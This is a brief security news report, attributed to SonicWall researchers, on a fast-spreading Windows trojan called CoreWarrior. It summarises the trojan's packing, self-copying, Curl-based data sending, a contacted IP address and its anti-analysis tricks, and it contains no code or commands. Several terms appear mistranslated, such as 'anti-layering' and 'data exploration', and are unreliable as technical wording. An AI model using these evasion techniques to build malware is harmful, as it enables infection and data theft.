Sonicwall experts have identified a surge in a sustainable trojan known as CoreWarrior, which is spreading at a high speed. The virus is capable of creating dozens of copies and connecting to multiple IP addresses, creating vulnerabilities in the Windows user interface.
The CoreWarrior trojan is distributed in the form of an executable file packaged using UPX, making it difficult to unpack with standard means. Upon execution, the program generates copies with random names and uses the command line to send data to a server via Curl. It continuously creates and removes copies, with the ability to produce more than a hundred copies within just 10 minutes.
During its operation, CoreWarrior opens listening ports within specific ranges and has been observed connecting to the IP address 172.67.183.40, although no active TCP/UDP traffic was detected.
The trojan is equipped with anti-analysis mechanisms, including anti-layering using RDTSC for time execution checks, random sleep timers, and the ability to detect virtual environments by checking for Hyperv containers. Additionally, the malware supports FTP, SMTP, and POP3 protocols for data exploration.
Sonicwall has promptly released signatures to protect users from the CoreWarrior trojan, and these should soon be adopted by other antivirus software manufacturers. To safeguard against potential attacks, users are advised to ensure their protective software is up to date, along with its signature base.